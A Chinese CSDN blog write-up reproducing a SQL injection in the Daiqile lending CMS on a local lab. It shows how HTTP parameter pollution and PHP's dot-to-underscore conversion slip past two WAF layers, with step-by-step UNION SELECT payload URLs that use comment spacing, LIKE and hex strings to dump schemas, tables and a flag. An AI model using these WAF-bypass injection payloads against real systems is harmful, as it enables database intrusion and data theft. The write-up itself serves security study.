贷齐乐系统最新版SQL注入(无需登录绕过WAF可union select跨表查询)

最新推荐文章于 2024-09-14 19:00:09 发布
最新推荐文章于 2024-09-14 19:00:09 发布
阅读量1.2k 收藏 6
点赞数 22
分类专栏: 网络安全 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68976043/article/details/136223479
版权

一、环境

已上传资源(daiqile)

二、代码解释

1.1Request

不管get请求还是post请求都可以接收到

1.2过滤的还挺多

 1.3第二个WAF把数据分为两个了一个Key一个value,全是explode的功劳

1.4submit是if进入的前提

 很明显走进来了

1.5那我们在这个前提下跟着传入id(结果如下)

 

检测一下字段:

http://127.0.0.1/daiqile/index.php?submit=aaaa&i_d=1%203--+

 

单引号闭合呢

 

下断看单引号走到哪里去了

好很明显被过滤掉了

而且这些字符被转为了中文,daabase(),information()等等括号都被废弃了

 

好了双重WAF很烦,第一重把特殊字符搞掉了,第二重把括号给咱转中文了

 那很难搞啊,我们想想有没有一种可能性,第一次WAF认为我是正常语句,第二个WAF可以覆盖,完蛋!!很难绕啊,这怎么可能,但是PHP有一个小特性,我们却可以利用,废话不多说看图

我的后端:

前端传两个id看一下 ,很明显PHP取的是后者

这点也被称之为hpp全局污染

 

取的第二个到底有什么用呢??哈哈哈大用可来了看好了

我们假设这样,我们有两个字段id=1' union select 1,2,3&id=2(恶意字符) ,后面我们是好好输入的,取第二个参数,所以第一个WAF过了,如果第二个WAF取的是我第一个参数,那不就好办了

再看个PHP特性,php可以将. ,转成下划线

很明显我前端传入

http://127.0.0.1/daiqile/index.php?submit=aaaa&i_d=1%27&i.d=2

不报错了 

在我后端看来我传的就是

i_d=1'&i_d=2222

 第一次进去:把我id放这里

第二次进去:

好了php特性传入的是i_d=1111'&i.d=22222

完美践行了我上面所说的思路,WAF检测的是2,而实际插入的数据库却是1 

ok实践插入语句吧(注意空格替换为/**/,前面有拦截)

http://127.0.0.1/daiqile/index.php?submit=&i_d=-1/**/union/**/select/**/1,2,3,4&i.d=2

很明显注入点出现了,是2 

注入:不知道库名

http://127.0.0.1/daiqile/index.php?submit=&i_d=-1/**/union/**/select/**/1,table_name,3,4/**/from%20information_schema.tables/**/where/**/table_schema=%27%27&i.d=2

三、找库名

 information()下依然有库名的表,schemat

来库名

那我们刚才的单引号中就可以填东西了,好了出数据,但是出的是第一个库,在实际ctf比赛中,我们已经成功了,那接下来一个一个试呗

http://127.0.0.1/daiqile/index.php?submit=&i_d=-1/**/union/**/select/**/1,SCHEMA_NAME,3,4/**/from/**/information_schema.schemata/**/limit/**/0,1&i.d=222

 好了,尝试成功:(很明显爆库了)

 四、库名出来注入表名

http://127.0.0.1/daiqile/index.php?submit=&i_d=-1/**/union/**/select/**/1,table_name,3,4/**/from/**/information_schema.tables/**/where/**/table_schema=%27ctf%27/**/limit/**/12,1&i.d=222

不出数据为什么呢???等号被截断了(等号分割),单引号在前端是正常的但是传入后端会url编码为%27数据库不认识,那我们就需要替换了

 解决方法:使用like,单引号使用16进制

五、出表

http://127.0.0.1/daiqile/index.php?submit=&i_d=-1/**/union/**/select/**/1,table_name,3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/0x637466/**/limit/**/0,1&i.d=222

 

六、查字段

很明显,id。name,pass,flag

http://127.0.0.1/daiqile/index.php?submit=&i_d=-1/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273/**/limit/**/0,10&i.d=222

七、查flag出数据:

http://127.0.0.1/daiqile/index.php?submit=aaa&i_d=-1/**/union/**/select/**/1,flag,3,4/**/from/**/ctf.users&i.d=123

八、 总结

单引号过滤16进制

等号过滤可以用like

空格绕过可以用注释符 

 

凌晨五点的星
关注
专栏目录
贷齐乐系统SQL注入复现
qq_58742048的博客
08-12 602
SQL注入时学到了一个很经典的案例,贷齐乐系统,安全问题严重。由于连续出了多次安全漏洞,所以贷齐乐系统中添加了严重影响正常使用的变态WAF。两条过滤,第一条一旦遇到select,包括单引号,包括注释符,就立即exit整个流程;而第二条替换最明显的效果,就是所有的英文括号都变成中文括号,导致user(),database()等无法执行。初学看到这俩WAF确实眼前一黑,学后发现绕过十分巧妙,故做一下复现,以作记录。漏洞的挖掘、利用十分巧妙,利用了hpp+php特性,最终绕过了CMS应用中变态的WAF
利用hpp+php的特性进行巧妙的sql注入
weixin_54347738的博客
09-04 125
贷齐乐这个系统是安全问题比较严重的P2P金融类的CMS。由于连续出了多次安全漏洞,所以官方给贷齐乐系统中添加了严重影响正常使用的变态WAF
贷齐乐系统最新版SQL注入绕过WAFunion select跨表查询
aihua002的博客
08-11 1024
目录标题:贷齐乐系统最新版SQL注入绕过WAFunion select跨表查询)内容:一,环境部署二,源码分析三,sql注入总结:[回到顶部](#article_top)
贷齐乐系统sql注入漏洞
banliyaoguai的博客
08-12 831
然后在这里取值的时候.和_会区分开,然后我们可以在第一个i_d写我们的payload,在i.d写正常数据用来绕过waf。可以使用使用php小特性和全局污染绕过,在这里的时候会将.转换成下划线,然后桡骨第一个waf。这里由于等号被过滤乐所以使用like,然后查表名的时候由于'被过滤所以使用了16进制编码。首先php在遇到两个相同名字参数时,php是取后一个的,如下图最终i_d的值为1。代码先走这里将输入的数据进行过滤。然后再继续往下走,再进行一个查询。然后继续往下,用=进行分割。
贷齐乐错误的waf引起的SQL注入漏洞复现
钟言的博客
03-07 6828
本篇复现贷齐乐错误的waf引起的SQL注入漏洞,详细内容包含了环境介绍 1、第一道WAF 2、第二道WAF 环境部署 1、模拟源码 2、连接数据库源码 3、数据库创建 4、测试 源码分析 1、模拟WAF 2、注入思路 3、PHP下划线特性 4、完成假设 四、联合查询注入 1、测试回显字段 2、爆出库名 3、爆出表名4、爆出表下的列名 4、爆出flag等内容
贷齐乐漏洞复现+php特性绕过WAF
qq_64395221的博客
08-11 772
GET/POST/REQUEST/COOKIE都会经过这个替换str_replace(array(‘&’, ‘"’, ‘’,‘(’,‘)’), array(‘&’, ‘"’, ‘’,‘(’,‘)’), $string),在我们的第一道WAF之后进行的,假设我们有一个方法让第一道WAF认为请求中没有恶意字符,再通过这里的覆盖,将恶意字符引入$_REQUEST中,就可以造成WAF绕过了。中的最后一个参数的转换为下划线然后接收,所以我们的正常代码放在第二个参数,waf失效。
RCE安全漏洞 贷齐乐系统Sql注入漏洞
nianwan2157的博客
08-12 650
远程代码执行(Remote Code Execution,RCE)是一种严重的网络安全漏洞,它允许攻击者通过输入恶意代码直接操控目标系统的执行权限。SQL注入SQL Injection)则是针对数据库应用程序的安全威胁,攻击者通过构造恶意SQL语句,欺骗应用程序执行非预期的操作。在RCE方面,值得关注的复现点包括:1漏洞利用示例:提供一些常见的RCE漏洞案例,如服务器端命令执行、文件包含漏洞等,以及相应的攻击向量和PoC(Proof of Concept)代码。
贷齐乐利用hpp+php特性进行注入
01-08
贷齐乐利用hpp+php特性进行注入
贷齐乐p2p借贷系统V2.1商业版
04-15
页面使用php技术 集理财与借款功能于一体 支持登录、注册 实名认证,手机号绑定、身份证 认证 支付宝充值、提现等功能
P2P借贷平台源码,拍拍贷借贷程序,贷齐乐借贷程序
06-04
P2P借贷平台源码/拍拍贷借贷程序/贷齐乐借贷程序,修正已知BUG,完美无错 使用前确保您空间支持PHP+MYSQL,还有伪静态,否则将无法正常使用! 使用规则位于根目录的.htaccess、httpd.ini文件,如何设置请咨询空间商! ...
齐乐手机2690产品培训资料.pptx
11-26
齐乐手机2690是一款特别为2010年上海世博会设计的音乐灯光折叠手机,具有独特的设计和出色的功能。这款手机以其创新的雪绒花呼吸灯和卓越的音乐体验为核心卖点,旨在吸引年轻用户群体。 产品概述: 齐乐2690手机...
navicate远程linux上的pgsql提示密码失败
最新发布
记录、分享、合作、共赢
09-14 183
2、postgresql.conf文件中,修改listen_addresses。3、重启pgsql,例如:systemctl restart pgsql。1、pg_hba.conf文件中,ipv4下面的内容改成。4、如果问题还在,检查firewalld防火墙,执行。5、再次尝试连接,成功!
pandas读取xlsx文件使用sqlachemy写到数据库
ithongchou的博客
09-10 507
如果你使用的是特定的数据库(如 SQLite、PostgreSQL、MySQL),你还需要安装相应的数据库驱动。通过这些步骤,你可以方便地将 Excel 文件中的数据写入数据库。连接字符串的格式取决于你使用的数据库。(用于读取 Excel 文件)。方法将 DataFrame 数据写入数据库。读取 Excel 文件。
SQL题目解析:外卖平台数据分析
天冬忘忧的博客
09-10 1210
在本次SQL中,我们将通过一系列查询来分析外卖平台的数据,包括用户、餐厅和订单信息。这些查询将帮助我们理解用户行为、餐厅表现和订单趋势。
SQL 代表什么?SQL 的全称是什么?
程序员学习园地。
09-09 1690
创建表修改表删除表。
基于SSM和VUE的药品管理系统(含源码+sql+视频导入教程+文档)
coderbu的博客
09-12 764
基于SSM和VUE的药品管理系统2拥有两种角色 管理员:药品管理、出库管理、入库管理、销售员管理、报损管理等 销售员:登录注册、入库、出库、销售、报损等
LabVIEW平台下的熔滴喷射关键参数测控系统设计
本文主要探讨了"熔滴喷射关键参数测控系统设计",由李杨、齐乐华等人合作完成。他们针对熔滴喷射技术中的核心要素——温度、气体压力以及激振频率对喷射质量的影响,设计了一套高效且精准的控制系统。该系统选择...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值